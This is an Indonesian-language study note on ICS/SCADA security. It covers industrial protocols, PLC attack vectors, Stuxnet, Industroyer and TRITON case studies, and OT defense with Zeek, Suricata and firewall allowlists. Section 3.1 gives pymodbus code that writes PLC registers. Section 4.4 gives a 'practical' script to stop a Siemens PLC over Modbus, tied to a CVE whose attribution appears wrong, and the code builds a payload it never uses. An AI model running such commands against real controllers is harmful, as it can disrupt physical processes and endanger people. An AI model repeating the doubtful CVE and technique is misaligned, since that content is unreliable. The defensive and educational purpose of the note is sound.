Ringkasan & Hubungan ke Vault

ICS/SCADA adalah domain keamanan siber yang paling jarang dibahas di komunitas umum, tapi paling berdampak jika terjadi breach. Catatan ini melengkapi hardware-hacking-re dengan target OT (Operational Technology), dan military-sigint-deepdive dengan relevansi critical infrastructure — Stuxnet, Industroyer, dan TRITON adalah malware yang mengubah cara perang siber.

Domain: Cyber Security / OT Security Tags: ics scada plc modbus dnp3 stuxnet ot-security

Daftar Isi

  1. OT vs IT — Paradigma Berbeda
  2. Purdue Model untuk ICS
  3. Protokol Industri
  4. PLC Internals & Exploitation
  5. HMI & SCADA Systems
  6. Stuxnet — Anatomy of a Cyber Weapon
  7. ICS Malware Case Studies
  8. OT Network Defense
  9. Security Frameworks
  10. Koneksi ke Vault

1. OT vs IT — Paradigma Berbeda

1.1 CIA Triad Reversed

AspekIT EnterpriseOT/ICS
PriorityC → I → AA → I → C
AvailabilityToleransi downtime jam/hariZero downtime tolerated (pabrik berhenti = rugi juta/menit)
IntegrityPenting (data)Kritis (PLC logic integrity prevents physical damage)
ConfidentialityPaling penting (data user/korporat)Terendah — but physical access control
Patch CycleMinggu-bulan6-12 bulan (validation di test bed dulu)
Service Life3-5 tahun15-30 tahun (WinXP masih jalan di pabrik)
RebootWeekly/monthlySetahun sekali (turnaround maintenance)
NetworkTCP/IP dominantFieldbus (Modbus, Profinet) + TCP/IP di level atas

1.2 Karakteristik OT Environment

IT Network (Enterprise):
  Switch → Firewall → Server → Storage → Patch → Reboot → Done

OT Network (Plant Floor):
  PLC (15 tahun) → RTU (10 tahun) → HMI (Win7) → Engineering Workstation
  ↑ Tidak bisa patch (validasi cost mahal)
  ↑ Tidak bisa reboot (production running 24/7)
  ↑ Sering running legacy OS (XP, Win7, CE)
  ↑ Protocol tidak punya security (Modbus = plaintext)

2. Purdue Model untuk ICS

2.1 Level 0-5 Architecture

┌──────────────────────────────────────────────────────┐
│ Level 5: Enterprise Network                          │
│ (ERP, Email, DNS, Internet access)                    │
├──────────────────────────────────────────────────────┤
│ Level 4: Site Business Planning                       │
│ (Asset management, Historian, Reporting)              │
├────────────────── DMZ ────────────────────────────────┤
│ Level 3: Operations & Control                         │
│ (HMI, SCADA server, Engineering workstation, AV)      │
├──────────────────────────────────────────────────────┤
│ Level 2: Supervisory Control                          │
│ (Control room, Alarm management, Data historian)      │
├──────────────────────────────────────────────────────┤
│ Level 1: Basic Control                                │
│ (PLC, RTU, DCS controller, VFD, servo)               │
├──────────────────────────────────────────────────────┤
│ Level 0: Physical Process                             │
│ (Sensor, actuator, motor, valve, conveyor)            │
└──────────────────────────────────────────────────────┘

Key insight: Semua serangan ICS terkenal (Stuxnet, Industroyer, TRITON) penetrasi dari Level 5/4 → turun sampai Level 1/0. Tidak ada yang langsung menyerang PLC tanpa melewati layers di atasnya.

2.2 DMZ Architecture

Enterprise Network (Level 4/5)
        │
        │ ┌─── Firewall (allowlist only) ────┐
        │ │   Open: HTTPS historian mirror    │
        │ │   Open: AD sync (one-way)        │
        │ │   Closed: RDP, SSH, SMB           │
        │ └───────────────────────────────────┘
        │
   OT DMZ (Level 3.5)
        │
        │ ┌─── Jump Box / Bastion Host ──────┐
        │ │   RDP/SSH dari IT? → login jump  │
        │ │   box → RDP/SSH ke OT dari sini   │
        │ └───────────────────────────────────┘
        │
        │ ┌─── Firewall (allowlist only) ────┐
        │ │   Open: Historian push (OT→DMZ)  │
        │ │   Open: AAA (read-only AD)       │
        │ │   Closed: semuanya               │
        │ └───────────────────────────────────┘
        │
 Control Network (Level 0-3)

3. Protokol Industri

3.1 Modbus TCP/RTU

Karakteristik: Protokol tertua (1979), masih paling banyak dipakai.

// Modbus TCP frame
┌─────────────────────────────────────────────────────────┐
│ Transaction ID │ Protocol │ Length │ Unit ID │ FC │ Data │
│ (2 bytes)      │ (2 bytes)│(2 bytes)│(1 byte) │1 b │N b  │
├────────────────┼──────────┼────────┼─────────┼─────┼─────┤
0x00010x00000x00050x010x03│data │
└─────────────────────────────────────────────────────────┘

Function Codes:

CodeFunctionAttack Relevance
0x01Read CoilsRead digital output states
0x02Read Discrete InputsRead sensor status
0x03Read Holding RegistersRead critical PLC parameters
0x04Read Input RegistersRead analog sensor values
0x05Write Single CoilStart/stop actuator
0x06Write Single RegisterModify PLC parameter
0x0FWrite Multiple CoilsMulti actuator control
0x10Write Multiple RegistersBulk parameter modification
0x11Report Server IDReconnaissance

Security Issues:

  • No authentication — siapa pun bisa write coil/register
  • No encryption — plaintext protocol
  • No session management — stateless
  • Broadcast messages — bisa DoS satu segmen
# modbus interaction via CLI
# Install: pip install pymodbus
 
python3 -c "
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.1.100', port=502)
client.connect()
 
# Read holding register (address 0)
result = client.read_holding_registers(0, 10, slave=1)
print(f'Register 0-9: {result.registers}')
 
# Write register — MODIFIKASI PARAMETER PLC!
client.write_register(0, 0x0000, slave=1)
client.close()
"

3.2 DNP3

Karakteristik: Digunakan di energi (power grid, substation). Lebih advanced dari Modbus.

DNP3 Frame:
┌────┬────┬────┬────┬────┬────┬─────┬──────┬───────┐
│Sync│Len │Dest│Src │CRC │Ctrl │Data  │CRC   │Data   │
│0564│ XX │Addr│Addr│16b │1b   │ N b  │16b   │ M b   │
└────┴────┴────┴────┴────┴────┴─────┴──────┴───────┘

DNP3 Secure Authentication v5:

  • Challenge-response authentication
  • Session keys dengan predefined timeout
  • Tapi: default disabled di banyak implementasi

3.3 IEC 61850

Standar substation automation:

  • GOOSE (Generic Object Oriented Substation Event): peer-to-peer, multicast, <3ms latency
  • MMS (Manufacturing Message Specification): client-server, laporan, log
  • SV (Sampled Values): raw voltage/current samples

Attack surface: GOOSE poisoning bisa bikin relay trip false — padamkan jaringan listrik.

3.4 Protocol Security Comparison

ProtocolAuthEncryptionIntegrityUse Case
Modbus TCP❌ (CRC saja)General industrial
Modbus RTU❌ (LRC)Serial device
DNP3 SAv5✅ OptionalPower grid
IEC 61850❌ (GOOSE)Substation
ProfinetFactory automation
EtherNet/IPCIP-based
OPC UA✅ X.509✅ AES✅ SignatureModern SCADA
MQTT (v5)✅ TLSIoT/IIoT

4. PLC Internals & Exploitation

4.1 PLC Architecture

┌─────────────────────────────────────┐
│  CPU Module                          │
│  ┌──────────┐  ┌──────────────────┐ │
│  │   ARM/   │  │     Memory       │ │
│  │   x86    │  │  ┌────────────┐  │ │
│  │          │  │  │ Firmware   │  │ │
│  │          │  │  ├────────────┤  │ │
│  │          │  │  │ Logic Code │  │ │
│  │          │  │  ├────────────┤  │ │
│  │          │  │  │ Data Block │  │ │
│  │          │  │  └────────────┘  │ │
│  └──────────┘  └──────────────────┘ │
├─────────────────────────────────────┤
│  I/O Modules                         │
│  ┌─────────┐ ┌─────────┐ ┌───────┐ │
│  │ Digital │ │ Analog  │ │Comm   │ │
│  │ Input   │ │ Input   │ │Module │ │
│  └─────────┘ └─────────┘ └───────┘ │
└─────────────────────────────────────┘

4.2 Scan Cycle (PLC Operation Loop)

1. Baca Input →     Read physical input status
2. Execute Logic →  Process ladder/ST code
3. Update Output →  Write to physical outputs
4. Housekeeping →   Comm, diagnostics, watchdog
         ↻

Cycle time: 1-100ms tergantung PLC. Attack: jika lo bisa membuat PLC stuck di loop giant (infinite loop atau heavy computation), PLC akan skip scan cycle → watchdog reset → PLC shutdown.

4.3 PLC Exploitation Vectors

AttackMethodImpact
Stop PLCWrite STOP ke Mode registerProcess stops
Modify LogicUpload malicious ladder (.L5X/.XCL)Change process behavior
Data Block PoisonWrite ke Input/Output registersMisread sensor, misactuate
Firmware DowngradeFlash vulnerable firmwarePersistent access
Backdoor LogicHidden rung dengan debug triggerCovert control
Man-in-MiddleModbus/TCP interceptRead + modify live values
Engineering Station PwnCompromise PC yang connect ke PLCUndetected via trusted path

4.4 Practical: PLC Stop via Modbus

# Siemens S7-1200 STOP via network
# CVE-2021-31800 — improper input validation
python3 -c "
from pymodbus.client import ModbusTcpClient
import struct
 
c = ModbusTcpClient('192.168.1.10', port=502)
c.connect()
# Write STOP command ke control register
payload = struct.pack('>H', 0x0001)  # STOP = 0x0001
c.write_register(0x0000, 0x0001, slave=1)
print('PLC STOP command sent')
c.close()
"

5. HMI & SCADA Systems

5.1 Common SCADA Software

SoftwareVendorPlatformKnown Vulns
WinCCSiemensWindowsCVE-2020-15782 (RCE)
CitectSchneiderWindowsCVE-2019-6831 (RCE)
WonderwareAvevaWindowsCVE-2021-27583 (Auth bypass)
RSLogixRockwellWindowsCVE-2020-5803 (RCE)
IgnitionInductiveCross-platformMany API vulns

5.2 HMI Attack Surface

HMI (Windows 7 Embedded)
├── OPC Server (port 135/tcp — discoverable)
├── Web interface (port 80/443 — often default creds)
├── Remote desktop (3389 — visible via Shodan)
├── Engineering port (102/tcp Siemens, 44818/tcp Rockwell)
└── Alarm logging (Syslog — no auth)

6. Stuxnet — Anatomy of a Cyber Weapon

6.1 Timeline

DateEventDetails
Mid-2009Initial infectionUSB drive, Natanz enrichment facility
Jan 2010Payload activationCentrifuge RPM manipulation
Jun 2010DiscoveryBelarusian security firm detect
Jul 2010Public disclosureMicrosoft advisory
Sep 2010Full analysis4 zero-days revealed

6.2 Zero-days Used

CVEComponentTypePurpose
CVE-2010-2568Windows LNKRCESpread via USB (autorun)
CVE-2010-2729Print SpoolerLPEEscalate from user
CVE-2008-4250RPC (MS08-067)RCENetwork worm spread
CVE-2010-2743Keyboard LayoutLPEDLL hijacking
2x signed certRealTek/JMicronDigital signatureSigned drivers, kernel access

6.3 Technical Architecture

Stuxnet Flow:
USB Infection (LNK zero-day)
    ↓
MS08-067 network propagation
    ↓
Print Spooler LPE → SYSTEM
    ↓
Steal signed certificates (RealTek, JMicron)
    ↓
Install kernel rootkit (hides files, process)
    ↓
Check: Is this a Siemens S7-300 PLC?
    ├── No → stay dormant (spread silently)
    └── Yes → upload malicious Step7 blocks to PLC
              ↓
    Man-in-the-middle on S7-200 protocol
    ↓
    Modulate centrifuge frequency: 8Hz → 1,065Hz → 2Hz
    ↓
    Record normal operation → replay to monitoring
    ↓
    Physical damage centrifuge (ZIRCONIUM tubes)

Key innovation: Stuxnet gak cuma ngerusak PLC logic — dia nge-MITM komunikasi antara HMI dan PLC. HMI ngirim sinyal “normal” → Stuxnet intercept → kirim modified command ke PLC → PLC balas “normal” → Stuxnet modify response ke HMI. Operator lihat display normal, padahal centrifuge hancur.

6.4 Lessons

  1. Signed kernel drivers defeat Windows security — stolen certs are gold
  2. Air gap ≠ security — USB is the bridge
  3. 4 zero-days untuk meyakinkan penetrasi — no single layer stop it
  4. Physical damage is the real weapon, not data theft — pertama kalinya malware cause physical destruction
  5. Multi-year operation — dibangun bertahun-tahun untuk target spesifik

7. ICS Malware Case Studies

7.1 Industroyer / CrashOverride (Ukraine 2016)

AspectDetail
TargetKyiv power grid substation
DateDecember 2016
Impact1/5 of Kyiv power — 225,000 customers blackout 1 hour
ProtocolIEC 61850 (GOOSE), IEC 104, OPC DA
TechniqueDirect attack on substation switchgear (breaker open)
PersistenceSerial-to-Ethernet converter reprogramming
AttributionSandworm (GRU Unit 74455)

Why it matters: First malware to attack power grid from IT network. Industroyer langsung kirim command OPEN ke circuit breaker via IEC 104. One-shot attack — gak perlu persistence karena efeknya langsung padam.

7.2 TRITON / TRISIS (Saudi Arabia 2017)

AspectDetail
TargetPetrochemical plant, Saudi Arabia
TechniqueSchneider Triconex safety instrumented system (SIS) rootkit
PayloadOverwrite memory Tricon safety controller — disable safety shutdown
ImpactCould cause catastrophic physical damage (tank rupture, fire)
AttributionRussia (general consensus)

Why it matters: TRITON target safety system — bukan kontrol system. Safety system dirancang untuk SHUT DOWN plant jika sesuatu rusak. TRITON mematikan Safety Instrumented System (SIS) — jadi kalaupun ada kerusakan, safety gak akan aktif. Ini “disable the brakes” attack.

7.3 Other Notable ICS Malware

NameYearTargetMethod
BlackEnergy22015Ukraine powerSpearphish → SCADA access → breaker open
Havex2014Energy sectorOPC scanner + watering hole attack
Dragonfly/Energetic Bear2014US/European energySpearphish, trojanized ICS software
PipeDream/INCONTROLLER2022MultipleCODESYS runtime exploit, OPC UA scanning
CosmicEnergy2023EnergyIEC-104 + libraries for power grid
FrostyGoop2024Energy (Ukraine)Modbus TCP attack on district heating

8. OT Network Defense

8.1 Defense-in-Depth for OT

┌──────────────────────────────────────────────────┐
│ Physical Security                                 │
│ (Fence, guard, badge, mantrap, CCTV)              │
├──────────────────────────────────────────────────┤
│ Network Segmentation                              │
│ (Purdue, DMZ, one-way diode, firewalls per layer)  │
├──────────────────────────────────────────────────┤
│ Host Hardening                                    │
│ (App whitelist, disable USB, patch cycle, AV)     │
├──────────────────────────────────────────────────┤
│ Monitoring & Detection                            │
│ (Zeek ICS plugins, Suricata rules, SIEM)          │
├──────────────────────────────────────────────────┤
│ Response & Recovery                               │
│ (Backup configuration, spare PLC, air-gapped)     │
└──────────────────────────────────────────────────┘

8.2 OT Firewall Rules

Standard enterprise firewall (allow any to any, then block bad) tidak bekerja untuk OT. OT firewall harus allowlist: semua blocked by default, hanya izinkan yang known.

# Contoh allowlist untuk OT zone:
OT_FIREWALL_RULES = {
    # Modbus TCP — hanya dari HMI ke PLC (bidirectional yang defined)
    "allow": {
        "10.10.1.0/24 → 10.10.2.0/24": {"tcp/502"},     # HMI → PLC
        "10.10.3.10 → 10.10.1.100": {"tcp/44818"},        # Engineering → PLC Rockwell
        "192.168.1.0/24 → 192.168.2.0/24": {"tcp/102"},   # Siemens S7
    },
    # Block semua Modbus dari enterprise
    "deny": {
        "10.0.0.0/8 → 10.10.0.0/16": {"tcp/502", "tcp/102", "tcp/20000"},
    }
}

8.3 Network Monitoring untuk OT (Zeek + Suricata)

# Zeek ICS plugin — detect Modbus anomaly
# /usr/local/zeek/share/zeek/site/local.zeek
@load protocols/modbus
 
# Custom Modbus rule
event modbus_write_single_register(c: connection,
    headers: ModbusHeaders, reg: count, val: count) {
    if (reg < 100 || reg > 200) {
        NOTICE([$note=Modbus::Unexpected_Write,
                $msg=fmt("Unexpected register write: %d=%d", reg, val),
                $conn=c]);
    }
}
 
# Suricata Modbus rule
alert modbus any any -> any any (msg:"MODBUS Write multiple coils";
    modbus.function:15; modbus.reference:1,5000;
    sid:1000001; rev:1;)

8.4 OT Asset Inventory (Critical)

Gak bisa defend apa yang gak lo tahu ada. OT asset discovery:

# Nmap dengan Modbus/PLC detection
nmap -sV -p 502,102,44818,20000,4840 10.10.0.0/16 -oA ot_assets
 
# Shodan untuk OT (public-facing)
shodan search "port:502 country:ID"   # Lihat berapa Modbus exposed di Indonesia
 
# Passive asset discovery (Zeek without scanning)
zeek -i eth0 local.zeek
# Output: modbus.log, s7comm.log, enip.log

9. Security Frameworks

9.1 ISA/IEC 62443

Standar utama untuk industri:

PartTitleRelevance
62443-1-1Terminology, concepts, modelsFoundation
62443-2-1IACS security management systemProgram level
62443-3-3System security requirementsTechnical level
62443-4-1Secure product development lifecycleVendor
62443-4-2Technical security for IACS componentsDevice level

Security Levels (SL):

  • SL 1: Protection against casual violation
  • SL 2: Protection against intentional simple means
  • SL 3: Protection against intentional sophisticated means
  • SL 4: Protection against intentional advanced (nation-state)

9.2 NIST SP 800-82 Rev2

Guide to Industrial Control Security:

  • Risk Management Framework untuk ICS
  • Specific threats per sector (energy, water, manufacturing, transportation)
  • Security control tailoring untuk OT environment

9.3 NERC CIP (North America - Energy)

Wajib di US/Canada untuk power grid:

  • CIP-002: Critical asset identification
  • CIP-003: Security management controls
  • CIP-005: Electronic security perimeters
  • CIP-007: Systems security management
  • CIP-009: Recovery plans

10. Koneksi ke Vault

NoteHubungan
hardware-hacking-rePLC/RTU hardware anatomy, firmware extraction
military-sigint-deepdiveStuxnet dimensions, OT sebagai target militer
wireless-security-deepdiveWireless sensor networks, Zigbee for SCADA
threat-modeling-deepdiveSTRIDE for OT, attack tree PLC
embedded-systemsPLC = embedded system dengan RTOS
purple-team-osi-killchainKillchain khusus OT: reconnaissance PLC, exploitation
incident-response-frameworkIncident response khusus OT (shutdown vs continue)
blueteam-detection-matrixDetection matrix untuk ICS malware

📚 Referensi

  1. ICS-CERT Advisories: https://www.cisa.gov/ics
  2. NIST SP 800-82 Rev2: Guide to ICS Security
  3. MITRE ATT&CK for ICS: https://attack.mitre.org/techniques/ics/
  4. “Industrial Network Security” — Eric D. Knapp
  5. “Hacking Exposed: Industrial Control Systems” — Bodungen, Singer, Shbeeb
  6. Stuxnet Analysis: https://www.langner.com/stuxnet/ (Langner report)
  7. Dragos ICS/OT Security Year in Review